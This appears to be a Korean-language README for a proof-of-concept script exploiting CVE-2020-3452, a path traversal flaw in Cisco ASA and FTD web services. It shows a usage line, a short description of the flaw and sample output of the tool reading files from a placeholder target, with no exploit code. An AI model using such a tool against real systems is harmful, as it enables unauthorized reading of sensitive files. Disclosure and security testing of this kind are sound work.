
CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software 및 Cisco Firepower Threat Defense (FTD) 경로 탐색
사용법: CVE-2020-3452.py https://target
취약점 설명: Cisco Adaptive Security Appliance (ASA) Software 및 Cisco Firepower Threat Defense (FTD) Software의 웹 서비스 인터페이스에서 취약점으로 인해 인증되지 않은 원격 공격자가 디렉토리 탐색 공격을 수행하고 대상 시스템에서 중요한 파일을 읽을 수 있습니다.
샘플 출력:
➜ Cisco-ASA-FTD-Web-Services-Traversal git:(main) ✗ python CVE-2020-3452.py https://target
+-------------------------------------------------------------+
- [ Cisco ASA / FTD Web Services Traversal Vulnerability ]
- -[ CVE-2020-3452 - PoC by: LiquidSky ^_^ ]-
+-------------------------------------------------------------+
[*] Checking potential target : https://target
[+] https://target is vulnerable...
[+] Grabbing logo.gif from the host.
[+] https://target is vulnerable...
[+] Grabbing http_auth.html from the host.
[+] https://target is vulnerable...